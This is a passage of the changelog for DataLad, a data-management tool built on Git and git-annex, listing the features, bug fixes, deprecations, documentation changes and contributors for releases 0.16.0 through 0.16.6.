<https://github.com/datalad/datalad/pull/6777>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Preserve final trailing slash in ``call_git()`` output\n `#6754 <https://github.com/datalad/datalad/pull/6754>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__\n `@christian-monch <https://github.com/christian-monch>`__)\n\n.. _pushed-to-maint-1:\n\nPushed to ``maint``\n-------------------\n\n- Make sure a subdataset is saved with a complete .gitmodules record\n (`@mih <https://github.com/mih>`__)\n\n.. _authors-5-1:\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.6 (Tue Jun 14 2022)\n========================\n\n.. _bug-fix-6:\n\nBug Fix\n-------\n\n- Prevent duplicated result rendering when searching in default\n datasets `#6765 <https://github.com/datalad/datalad/pull/6765>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- BF(workaround): skip test_ria_postclonecfg on OSX for now\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(workaround to #6759): if saving credential failed, just log error\n and continue `#6762 <https://github.com/datalad/datalad/pull/6762>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Prevent reentry of a runner instance\n `#6737 <https://github.com/datalad/datalad/pull/6737>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n\nAuthors: 2\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.5 (Wed Jun 08 2022)\n========================\n\n.. 
_bug-fix-7:\n\nBug Fix\n-------\n\n- BF: push to github - remove datalad-push-default-first config only in\n non-dry run to ensure we push default branch separately in next step\n `#6750 <https://github.com/datalad/datalad/pull/6750>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- In addition to default (system) ssh version, report configured ssh;\n fix ssh version parsing on Windows\n `#6729 <https://github.com/datalad/datalad/pull/6729>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 1\n----------\n\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.4 (Thu Jun 02 2022)\n========================\n\n.. _bug-fix-8:\n\nBug Fix\n-------\n\n- BF(TST): RO operations - add test directory into git safe.directory\n `#6726 <https://github.com/datalad/datalad/pull/6726>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: fixup of docstring for skip_ssh\n `#6727 <https://github.com/datalad/datalad/pull/6727>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: Set language in Sphinx config to en\n `#6727 <https://github.com/datalad/datalad/pull/6727>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: Catch KeyErrors from unavailable WTF infos\n `#6712 <https://github.com/datalad/datalad/pull/6712>`__\n (`@adswa <https://github.com/adswa>`__)\n- Add annex.private to ephemeral clones. That would make git-annex not\n assign shared (in git-annex branch) annex uuid.\n `#6702 <https://github.com/datalad/datalad/pull/6702>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__\n `@adswa <https://github.com/adswa>`__)\n- BF: require argcomplete version at least 1.12.3 to test/operate\n correctly `#6693 <https://github.com/datalad/datalad/pull/6693>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Replace Zenodo DOI with JOSS for due credit\n `#6725 <https://github.com/datalad/datalad/pull/6725>`__\n (`@adswa <https://github.com/adswa>`__)\n\n.. _authors-3-4:\n\nAuthors: 3\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.3 (Thu May 12 2022)\n========================\n\n.. 
_bug-fix-9:\n\nBug Fix\n-------\n\n- No change for a PR to trigger release\n `#6692 <https://github.com/datalad/datalad/pull/6692>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Sanitize keys before checking content availability to ensure correct\n value for keys with URL or custom backend\n `#6665 <https://github.com/datalad/datalad/pull/6665>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Change a key-value pair in drop result record\n `#6625 <https://github.com/datalad/datalad/pull/6625>`__\n (`@mslw <https://github.com/mslw>`__)\n- Link docs of datalad-next\n `#6677 <https://github.com/datalad/datalad/pull/6677>`__\n (`@mih <https://github.com/mih>`__)\n- Fix ``GitRepo.get_branch_commits_()`` to handle branch names\n conflicts with paths\n `#6661 <https://github.com/datalad/datalad/pull/6661>`__\n (`@mih <https://github.com/mih>`__)\n- OPT: AnnexJsonProtocol - avoid dragging possibly long data around\n `#6660 <https://github.com/datalad/datalad/pull/6660>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Remove two too prominent create() INFO log message that duplicate\n DEBUG log and harmonize some other log messages\n `#6638 <https://github.com/datalad/datalad/pull/6638>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Remove unsupported parameter create_sibling_ria(existing=None)\n `#6637 <https://github.com/datalad/datalad/pull/6637>`__\n (`@mih <https://github.com/mih>`__)\n- Add released plugin to .autorc to annotate PRs on when released\n `#6639 <https://github.com/datalad/datalad/pull/6639>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 4\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Micha Szczepanik (`@mslw <https://github.com/mslw>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.2 (Thu Apr 21 2022)\n========================\n\n.. _bug-fix-10:\n\nBug Fix\n-------\n\n- Demote (to level 1 from DEBUG) and speed-up API doc logging\n (parseParameters)\n `#6635 <https://github.com/datalad/datalad/pull/6635>`__\n (`@mih <https://github.com/mih>`__)\n- Factor out actual data transfer in push\n `#6618 <https://github.com/datalad/datalad/pull/6618>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- ENH: include version of datalad in tests teardown Versions: report\n `#6628 <https://github.com/datalad/datalad/pull/6628>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- MNT: Require importlib-metadata >=3.6 for Python < 3.10 for\n entry_points taking kwargs\n `#6631 <https://github.com/datalad/datalad/pull/6631>`__\n (`@effigies <https://github.com/effigies>`__)\n- Factor out credential handling of create-sibling-ghlike\n `#6627 <https://github.com/datalad/datalad/pull/6627>`__\n (`@mih <https://github.com/mih>`__)\n- BF: Fix wrong key name of annex’ JSON records\n `#6624 <https://github.com/datalad/datalad/pull/6624>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _pushed-to-maint-2:\n\nPushed to ``maint``\n-------------------\n\n- Fix typo in changelog (`@mih <https://github.com/mih>`__)\n- [ci skip] minor typo fix\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. 
_authors-5-2:\n\nAuthors: 5\n----------\n\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Chris Markiewicz (`@effigies <https://github.com/effigies>`__)\n- Christian Mönch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.1 (Fr Apr 8 2022) – April Fools’ Release\n=============================================\n\n- Fixes forgotten changelog in docs\n\n0.16.0 (Fr Apr 8 2022) – Spring cleaning!\n=========================================\n\n.. _enhancements-and-new-features-4:\n\nEnhancements and new features\n-----------------------------\n\n- A new set of ``create-sibling-*`` commands reimplements the\n GitHub-platform support of ``create-sibling-github`` and adds support\n to interface three new platforms in a unified fashion: GIN\n (``create-sibling-gin``), GOGS (``create-sibling-gogs``), and Gitea\n (``create-sibling-gitea``). All commands rely on personal access\n tokens only for authentication, allow for specifying one of several\n stored credentials via a uniform ``--credential`` parameter, and\n support a uniform ``--dry-run`` mode for testing without network.\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-github`` now supports direct specification of\n organization repositories via a ``[<org>/]repo`` syntax\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-gitlab`` gained a ``--dry-run`` parameter to match\n the corresponding parameters in\n ``create-sibling-{github,gin,gogs,gitea}``\n `#6013 <https://github.com/datalad/datalad/pull/6013>`__ (by @adswa)\n- The ``--new-store-ok`` parameter of ``create-sibling-ria`` only\n creates new RIA stores when explicitly provided\n `#6045 <https://github.com/datalad/datalad/pull/6045>`__ (by @adswa)\n- The default performance of ``status()`` and ``diff()`` commands is\n improved by up to 700% by removing file-type evaluation as a default\n operation, and simplifying the type reporting rule\n `#6097 <https://github.com/datalad/datalad/pull/6097>`__ (by @mih)\n- ``drop()`` and ``remove()`` were reimplemented in full,\n conceptualized as the antagonist commands to ``get()`` and\n ``clone()``. A new, harmonized set of parameters\n (``--what ['filecontent', 'allkeys', 'datasets', 'all']``,\n ``--reckless ['modification', 'availability', 'undead', 'kill']``)\n simplifies their API. Both commands include additional safeguards.\n ``uninstall`` is replaced with a thin shim command around ``drop()``\n `#6111 <https://github.com/datalad/datalad/pull/6111>`__ (by @mih)\n- ``add_archive_content()`` was refactored into a dataset method and\n gained progress bars\n `#6105 <https://github.com/datalad/datalad/pull/6105>`__ (by @adswa)\n- The ``datalad`` and ``datalad-archives`` special remotes have been\n reimplemented based on ``AnnexRemote``\n `#6165 <https://github.com/datalad/datalad/pull/6165>`__ (by @mih)\n- The ``result_renderer()`` semantics were decomplexified and\n harmonized. The previous ``default`` result renderer was renamed to\n ``generic``. 
`#6174 <https://github.com/datalad/datalad/pull/6174>`__\n (by @mih)\n- ``get_status_dict`` learned to include exit codes in the case of\n CommandErrors\n `#5642 <https://github.com/datalad/datalad/pull/5642>`__ (by\n @yarikoptic)\n- ``datalad clone`` can now pass options to ``git-clone``, adding\n support for cloning specific tags or branches, naming siblings other\n names than ``origin``, and exposing ``git clone``\\ ’s optimization\n arguments `#6218 <https://github.com/datalad/datalad/pull/6218>`__\n (by @kyleam and @mih)\n- Inactive BatchedCommands are cleaned up\n `#6206 <https://github.com/datalad/datalad/pull/6206>`__ (by\n @jwodder)\n- ``export-archive-ora`` learned to filter files exported to 7z\n archives `#6234 <https://github.com/datalad/datalad/pull/6234>`__ (by\n @mih and @bpinsard)\n- ``datalad run`` learned to glob recursively\n `#6262 <https://github.com/datalad/datalad/pull/6262>`__ (by @AKSoo)\n- The ORA remote learned to recover from interrupted uploads\n `#6267 <https://github.com/datalad/datalad/pull/6267>`__ (by @mih)\n- A new threaded runner with support for timeouts and generator-based\n subprocess communication is introduced and used in ``BatchedCommand``\n and ``AnnexRepo``\n `#6244 <https://github.com/datalad/datalad/pull/6244>`__ (by\n @christian-monch)\n- A new switch allows to enable librarymode and queries for the\n effective API in use\n `#6213 <https://github.com/datalad/datalad/pull/6213>`__ (by @mih)\n- ``run`` and ``rerun`` now support parallel jobs via ``--jobs``\n `#6279 <https://github.com/datalad/datalad/pull/6279>`__ (by @AKSoo)\n- A new ``foreach-dataset`` plumbing command allows to run commands on\n each (sub)dataset, similar to ``git submodule foreach``\n `#5517 <https://github.com/datalad/datalad/pull/5517>`__ (by\n @yarikoptic)\n- The ``dataset`` parameter is not restricted to only locally\n resolvable file-URLs anymore\n `#6276 <https://github.com/datalad/datalad/pull/6276>`__ (by\n @christian-monch)\n- DataLad’s credential system is now able to query ``git-credential``\n by specifying credential type ``git`` in the respective provider\n configuration\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- DataLad now comes with a git credential helper\n ``git-credential-datalad`` allowing Git to query DataLad’s credential\n system `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack and @mih)\n- The new runner now allows for multiple threads\n `#6371 <https://github.com/datalad/datalad/pull/6371>`__ (by\n @christian-monch)\n- A new configurationcommand provides an interface to manipulate and\n query the DataLad configuration.\n `#6306 <https://github.com/datalad/datalad/pull/6306>`__ (by @mih)\n\n - Unlike the global Python-only datalad.cfg or dataset-specific\n Dataset.config configuration managers, this command offers a\n uniform API across the Python and the command line interfaces.\n - This command was previously available in the mihextras extension\n as x-configuration, and has been merged into the core package in\n an improved version.\n `#5489 <https://github.com/datalad/datalad/pull/5489>`__ (by @mih)\n - In its default dump mode, the command provides an annotated list\n of the effective configuration after considering all configuration\n sources, including hints on additional configuration settings and\n their supported values.\n\n- The command line interface help-reporting has been sped up by ~20%\n `#6370 <https://github.com/datalad/datalad/pull/6370>`__\n `#6378 
<https://github.com/datalad/datalad/pull/6378>`__ (by @mih)\n- ``ConfigManager`` now supports reading committed dataset\n configuration in bare repositories. Analogous to reading\n ``.datalad/config`` from a worktree, ``blob:HEAD:.datalad/config`` is\n read (e.g., the config committed in the default branch). The support\n includes ``reload()`` change detection using the gitsha of this\n file. The behavior for non-bare repositories is unchanged.\n `#6332 <https://github.com/datalad/datalad/pull/6332>`__ (by @mih)\n- The CLI help generation has been sped up, and now also supports the\n completion of parameter values for a fixed set of choices\n `#6415 <https://github.com/datalad/datalad/pull/6415>`__ (by @mih)\n- Individual command implementations can now declare a specific\n “on-failure” behavior by defining ``Interface.on_failure`` to be one\n of the supported modes (stop, continue, ignore). Previously, such a\n modification was only possible on a per-call basis.\n `#6430 <https://github.com/datalad/datalad/pull/6430>`__ (by @mih)\n- The ``run`` command changed its default “on-failure” behavior from\n ``continue`` to ``stop``. This change prevents the execution of a\n command in case a declared input can not be obtained. Previously,\n only an error result was yielded (and run eventually yielded a\n non-zero exit code or an ``IncompleteResultsException``), but the\n execution proceeded and potentially saved a dataset modification\n despite incomplete inputs, in case the command succeeded. This\n previous default behavior can still be achieved by calling run with\n the equivalent of ``--on-failure continue``\n `#6430 <https://github.com/datalad/datalad/pull/6430>`__ (by @mih)\n- The ``run`` command now provides readily executable, API-specific\n instructions on how to save the results of a command execution that\n failed expectedly\n `#6434 <https://github.com/datalad/datalad/pull/6434>`__ (by @mih)\n- ``create-sibling --since=^`` mode will now be as fast as\n ``push --since=^`` to figure out for which subdatasets to create\n siblings `#6436 <https://github.com/datalad/datalad/pull/6436>`__ (by\n @yarikoptic)\n- When file names contain illegal characters or reserved file names\n that are incompatible with Windows systems, a configurable check for\n ``save`` (``datalad.save.windows-compat-warning``) will either do\n nothing (``none``), emit an incompatibility warning (``warning``,\n default), or cause ``save`` to error (``error``)\n `#6291 <https://github.com/datalad/datalad/pull/6291>`__ (by @adswa)\n- Improve responsiveness of ``datalad drop`` in datasets with a large\n annex. 
`#6580 <https://github.com/datalad/datalad/pull/6580>`__ (by\n @christian-monch)\n- ``save`` code might operate faster on heavy file trees\n `#6581 <https://github.com/datalad/datalad/pull/6581>`__ (by\n @yarikoptic)\n- Removed a per-file overhead cost for ORA when downloading over HTTP\n `#6609 <https://github.com/datalad/datalad/pull/6609>`__ (by\n @bpoldrack)\n- A new module ``datalad.support.extensions`` offers the utility\n functions ``register_config()`` and ``has_config()`` that allow\n extension developers to announce additional configuration items to\n the central configuration management.\n `#6601 <https://github.com/datalad/datalad/pull/6601>`__ (by @mih)\n- When operating in a dirty dataset, ``export-to-figshare`` now yields\n an impossible result instead of raising a RuntimeError\n `#6543 <https://github.com/datalad/datalad/pull/6543>`__ (by @adswa)\n- Loading DataLad extension packages has been sped up, leading to\n between 2x and 4x faster run times for loading individual extensions\n and reporting help output across all installed extensions.\n `#6591 <https://github.com/datalad/datalad/pull/6591>`__ (by @mih)\n- Introduces the configuration key ``datalad.ssh.executable``. This key\n allows specifying an ssh-client executable that should be used by\n datalad to establish ssh-connections. The default value is ``ssh``\n unless on a Windows system where ``$WINDIR\System32\OpenSSH\ssh.exe``\n exists. In this case, the value defaults to\n ``$WINDIR\System32\OpenSSH\ssh.exe``.\n `#6553 <https://github.com/datalad/datalad/pull/6553>`__ (by\n @christian-monch)\n- create-sibling should perform much faster in case of ``--since``\n specification since it would consider only submodules related to the\n changes since that point.\n `#6528 <https://github.com/datalad/datalad/pull/6528>`__ (by\n @yarikoptic)\n- A new configuration setting\n ``datalad.ssh.try-use-annex-bundled-git=yes|no`` can be used to\n influence the default remote git-annex bundle sensing for SSH\n connections. This was previously done unconditionally for any call to\n ``datalad sshrun`` (which is also used for any SSH-related Git or\n git-annex functionality triggered by DataLad-internal processing) and\n could incur a substantial per-call runtime cost. The new default is\n to not perform this sensing, because for, e.g., use as\n GIT_SSH_COMMAND there is no expectation to have a remote git-annex\n installation, and even with an existing git-annex/Git bundle on the\n remote, it is not certain that the bundled Git version is to be\n preferred over any other Git installation in a user’s PATH.\n `#6533 <https://github.com/datalad/datalad/pull/6533>`__ (by @mih)\n- ``run`` now yields a result record immediately after executing a\n command. This allows callers to use the standard\n ``--on-failure`` switch to control whether dataset modifications will\n be saved for a command that exited with an error.\n `#6447 <https://github.com/datalad/datalad/pull/6447>`__ (by @mih)\n\n.. 
_deprecations-and-removals-1:\n\nDeprecations and removals\n-------------------------\n\n- The ``--pbs-runner`` commandline option (deprecated in ``0.15.0``)\n was removed `#5981 <https://github.com/datalad/datalad/pull/5981>`__\n (by @mih)\n- The dependency on PyGithub was dropped\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-github``\ ’s credential handling was trimmed down to\n only allow personal access tokens, because GitHub discontinued\n user/password based authentication\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-gitlab``\ ’s ``--dryrun`` parameter is deprecated in\n favor of ``--dry-run``\n `#6013 <https://github.com/datalad/datalad/pull/6013>`__ (by @adswa)\n- Internal obsolete ``GitRepo.*_submodule`` methods were moved to\n ``datalad-deprecated``\n `#6010 <https://github.com/datalad/datalad/pull/6010>`__ (by @mih)\n- ``datalad/support/versions.py`` is unused in DataLad core and removed\n `#6115 <https://github.com/datalad/datalad/pull/6115>`__ (by\n @yarikoptic)\n- Support for the undocumented ``datalad.api.result-renderer`` config\n setting has been dropped\n `#6174 <https://github.com/datalad/datalad/pull/6174>`__ (by @mih)\n- Undocumented use of ``result_renderer=None`` is replaced with\n ``result_renderer='disabled'``\n `#6174 <https://github.com/datalad/datalad/pull/6174>`__ (by @mih)\n- ``remove``\ ’s ``--recursive`` argument has been deprecated\n `#6257 <https://github.com/datalad/datalad/pull/6257>`__ (by @mih)\n- The use of the internal helper ``get_repo_instance()`` is\n discontinued and deprecated\n `#6268 <https://github.com/datalad/datalad/pull/6268>`__ (by @mih)\n- Support for Python 3.6 has been dropped\n (`#6286 <https://github.com/datalad/datalad/pull/6286>`__ (by\n @christian-monch) and\n `#6364 <https://github.com/datalad/datalad/pull/6364>`__ (by\n @yarikoptic))\n- All but one Singularity recipe flavor have been removed due to their\n limited value with the end of life of Singularity Hub\n `#6303 <https://github.com/datalad/datalad/pull/6303>`__ (by @mih)\n- All code in module datalad.cmdline was (re)moved, only\n datalad.cmdline.helpers.get_repo_instance is kept for a deprecation\n period (by @mih)\n- ``datalad.interface.common_opts.eval_default`` has been deprecated.\n All (command-specific) defaults for common interface parameters can\n be read from ``Interface`` class attributes\n `#6391 <https://github.com/datalad/datalad/pull/6391>`__ (by @mih)\n- Remove unused and untested ``datalad.interface.utils`` helpers\n ``cls2cmdlinename`` and ``path_is_under``\n `#6392 <https://github.com/datalad/datalad/pull/6392>`__ (by @mih)\n- An unused code path for result rendering was removed from the CLI\n ``main()`` `#6394 <https://github.com/datalad/datalad/pull/6394>`__\n (by @mih)\n- ``create-sibling`` will now require ``\"^\"`` instead of an empty\n string for the ``since`` option\n `#6436 <https://github.com/datalad/datalad/pull/6436>`__ (by\n @yarikoptic)\n- ``run`` no longer raises a ``CommandError`` exception for failed\n commands, but yields an ``error`` result that includes a superset of\n the information provided by the exception. This change impacts\n command line usage insofar as the exit code of the underlying command\n is no longer relayed as the exit code of the ``run`` command call –\n although ``run`` continues to exit with a non-zero exit code in case\n of an error. 
For Python API users, the nature of the raised exception\n changes from ``CommandError`` to ``IncompleteResultsError``, and the\n exception handling is now configurable using the standard\n ``on_failure`` command argument. The original ``CommandError``\n exception remains available via the ``exception`` property of the\n newly introduced result record for the command execution, and this\n result record is available via ``IncompleteResultsError.failed``, if\n such an exception is raised.\n `#6447 <https://github.com/datalad/datalad/pull/6447>`__ (by @mih)\n- Custom cast helpers were removed from datalad core and migrated to a\n standalone repository https://github.com/datalad/screencaster\n `#6516 <https://github.com/datalad/datalad/pull/6516>`__ (by @adswa)\n- The ``bundled`` parameter of ``get_connection_hash()`` is now ignored\n and will be removed with a future release.\n `#6532 <https://github.com/datalad/datalad/pull/6532>`__ (by @mih)\n- ``BaseDownloader.fetch()`` is logging download attempts on DEBUG\n (previously INFO) level to avoid polluting output of higher-level\n commands. `#6564 <https://github.com/datalad/datalad/pull/6564>`__\n (by @mih)\n\n.. _bug-fixes-15:\n\nBug Fixes\n---------\n\n- ``create-sibling-gitlab`` erroneously overwrote existing sibling\n configurations. A safeguard will now prevent overwriting and exit\n with an error result\n `#6015 <https://github.com/datalad/datalad/pull/6015>`__ (by @adswa)\n- ``create-sibling-gogs`` now relays HTTP500 errors, such as “no space\n left on device”\n `#6019 <https://github.com/datalad/datalad/pull/6019>`__ (by @mih)\n- ``annotate_paths()`` is removed from the last parts of code base that\n still contained it\n `#6128 <https://github.com/datalad/datalad/pull/6128>`__ (by @mih)\n- ``add_archive_content()`` doesn’t crash with ``--key`` and\n ``--use-current-dir`` anymore\n `#6105 <https://github.com/datalad/datalad/pull/6105>`__ (by @adswa)\n- ``run-procedure`` now returns an error result when a non-existent\n procedure name is specified\n `#6143 <https://github.com/datalad/datalad/pull/6143>`__ (by @mslw)\n- A fix for a silent failure of ``download-url --archive`` when\n extracting the archive\n `#6172 <https://github.com/datalad/datalad/pull/6172>`__ (by @adswa)\n- Uninitialized AnnexRepos can now be dropped\n `#6183 <https://github.com/datalad/datalad/pull/6183>`__ (by @mih)\n- Instead of raising an error, the formatters tests are skipped when\n the ``formatters`` module is not found\n `#6212 <https://github.com/datalad/datalad/pull/6212>`__ (by @adswa)\n- ``create-sibling-gin`` does not disable git-annex availability on Gin\n remotes anymore\n `#6230 <https://github.com/datalad/datalad/pull/6230>`__ (by @mih)\n- The ORA special remote messaging is fixed to not break the special\n remote protocol anymore and to better relay messages from exceptions\n to communicate underlying causes\n `#6242 <https://github.com/datalad/datalad/pull/6242>`__ (by @mih)\n- A ``keyring.delete()`` call was fixed to not call an uninitialized\n private attribute anymore\n `#6253 <https://github.com/datalad/datalad/pull/6253>`__ (by\n @bpoldrack)\n- An erroneous placement of result keyword arguments into a\n ``format()`` method instead of ``get_status_dict()`` of\n ``create-sibling-ria`` has been fixed\n `#6256 <https://github.com/datalad/datalad/pull/6256>`__ (by @adswa)\n- ``status``, ``run-procedure``, and ``metadata`` are no longer\n swallowing result-related messages in renderers\n `#6280 <https://github.com/datalad/datalad/pull/6280>`__ (by 
@mih)\n- ``uninstall`` now recommends the new ``--reckless`` parameter instead\n of the deprecated ``--nocheck`` parameter when reporting hints\n `#6277 <https://github.com/datalad/datalad/pull/6277>`__ (by @adswa)\n- ``download-url`` learned to handle Path objects\n `#6317 <https://github.com/datalad/datalad/pull/6317>`__ (by @adswa)\n- Restore default result rendering behavior broken by Key interface\n documentation\n `#6394 <https://github.com/datalad/datalad/pull/6394>`__ (by @mih)\n- Fix a broken check for file presence in the ``ConfigManager`` that\n could have caused a crash in rare cases when a config file is removed\n during the process runtime\n `#6332 <https://github.com/datalad/datalad/pull/6332>`__ (by @mih)\n- ``ConfigManager.get_from_source()`` now accesses the correct\n information when using the documented ``source='local'``, avoiding a\n crash `#6332 <https://github.com/datalad/datalad/pull/6332>`__ (by\n @mih)\n- ``run`` no longer lets the internal call to ``save`` render its\n results unconditionally, but the parameterization of run determines\n the effective rendering format.\n `#6421 <https://github.com/datalad/datalad/pull/6421>`__ (by @mih)\n- Remove an unnecessary and misleading warning from the runner\n `#6425 <https://github.com/datalad/datalad/pull/6425>`__ (by\n @christian-monch)\n- A number of commands no longer double-report results\n `#6446 <https://github.com/datalad/datalad/pull/6446>`__ (by @adswa)\n- ``create-sibling-ria`` no longer creates an ``annex/objects``\n directory in-store, when called with ``--no-storage-sibling``.\n `#6495 <https://github.com/datalad/datalad/pull/6495>`__ (by\n @bpoldrack)\n- Improve error message when an invalid URL is given to ``clone``.\n `#6500 <https://github.com/datalad/datalad/pull/6500>`__ (by @mih)\n- DataLad declares a minimum version dependency on ``keyring >= 20.0``\n to ensure that token-based authentication can be used.\n `#6515 <https://github.com/datalad/datalad/pull/6515>`__ (by @adswa)\n- ORA special remote tries to obtain permissions when dropping a key\n from a RIA store rather than just failing. A store with the same\n permissions in its object trees as one directly managed by git-annex\n thus works just fine now.\n `#6493 <https://github.com/datalad/datalad/pull/6493>`__ (by\n @bpoldrack)\n- ``require_dataset()`` now uniformly raises ``NoDatasetFound`` when no\n dataset was found. Implementations that catch the previously\n documented ``InsufficientArgumentsError`` or the actually raised\n ``ValueError`` will continue to work, because ``NoDatasetFound`` is\n derived from both types.\n `#6521 <https://github.com/datalad/datalad/pull/6521>`__ (by @mih)\n- Keyboard-interactive authentication is now possible with\n non-multiplexed SSH connections (i.e., when no connection sharing is\n possible, due to lack of socket support, for example on Windows).\n Previously, it was disabled forcefully by DataLad for no valid\n reason. `#6537 <https://github.com/datalad/datalad/pull/6537>`__ (by\n @mih)\n- Remove duplicate exception type in reporting of top-level CLI\n exception handler.\n `#6563 <https://github.com/datalad/datalad/pull/6563>`__ (by @mih)\n- Fixes DataLad’s parsing of git-annex’ reporting on unknown paths\n depending on its version and the value of the ``annex.skipunknown``\n config. 
`#6550 <https://github.com/datalad/datalad/pull/6550>`__ (by\n @bpoldrack)\n- Fix ORA special remote not properly reporting on HTTP failures.\n `#6535 <https://github.com/datalad/datalad/pull/6535>`__ (by\n @bpoldrack)\n- ORA special remote didn’t show per-file progress bars when\n downloading over HTTP\n `#6609 <https://github.com/datalad/datalad/pull/6609>`__ (by\n @bpoldrack)\n- ``save`` now can commit the change where file becomes a directory\n with a staged for commit file.\n `#6581 <https://github.com/datalad/datalad/pull/6581>`__ (by\n @yarikoptic)\n- ``create-sibling`` will no longer create siblings for not yet saved\n new subdatasets, and will now create sub-datasets nested in the\n subdatasets which did not yet have those siblings.\n `#6603 <https://github.com/datalad/datalad/pull/6603>`__ (by\n @yarikoptic)\n\n.. _documentation-10:\n\nDocumentation\n-------------\n\n- A new design document sheds light on result records\n `#6167 <https://github.com/datalad/datalad/pull/6167>`__ (by @mih)\n- The ``disabled`` result renderer mode is documented\n `#6174 <https://github.com/datalad/datalad/pull/6174>`__ (by @mih)\n- A new design document sheds light on the ``datalad`` and\n ``datalad-archives`` special remotes\n `#6181 <https://github.com/datalad/datalad/pull/6181>`__ (by @mih)\n- A new design document sheds light on ``BatchedCommand`` and\n ``BatchedAnnex``\n `#6203 <https://github.com/datalad/datalad/pull/6203>`__ (by\n @christian-monch)\n- A new design document sheds light on standard parameters\n `#6214 <https://github.com/datalad/datalad/pull/6214>`__ (by @adswa)\n- The DataLad project adopted the Contributor Covenant COC v2.1\n `#6236 <https://github.com/datalad/datalad/pull/6236>`__ (by @adswa)\n- Docstrings learned to include Sphinx’ “version added” and\n “deprecated” directives\n `#6249 <https://github.com/datalad/datalad/pull/6249>`__ (by @mih)\n- A design document sheds light on basic docstring handling and\n formatting `#6249 <https://github.com/datalad/datalad/pull/6249>`__\n (by @mih)\n- A new design document sheds light on position versus keyword\n parameter usage\n `#6261 <https://github.com/datalad/datalad/pull/6261>`__ (by\n @yarikoptic)\n- ``create-sibling-gin``\\ ’s examples have been improved to suggest\n ``push`` as an additional step to ensure proper configuration\n `#6289 <https://github.com/datalad/datalad/pull/6289>`__ (by @mslw)\n- A new `document <http://docs.datalad.org/credentials.html>`__\n describes the credential system from a user’s perspective\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- Enhance the `design\n document <http://docs.datalad.org/design/credentials.html>`__ on\n DataLad’s credential system\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- The documentation of the configuration command now details all\n locations DataLad is reading configuration items from, and their\n respective rules of precedence\n `#6306 <https://github.com/datalad/datalad/pull/6306>`__ (by @mih)\n- API docs for datalad.interface.base are now included in the\n documentation\n `#6378 <https://github.com/datalad/datalad/pull/6378>`__ (by @mih)\n- A new design document is provided that describes the basics of the\n command line interface implementation\n `#6382 <https://github.com/datalad/datalad/pull/6382>`__ (by @mih)\n- The \\`\\ ``datalad.interface.base.Interface`` class, the basis of all\n DataLad command implementations, has been extensively documented to\n provide an overview of basic principles and 
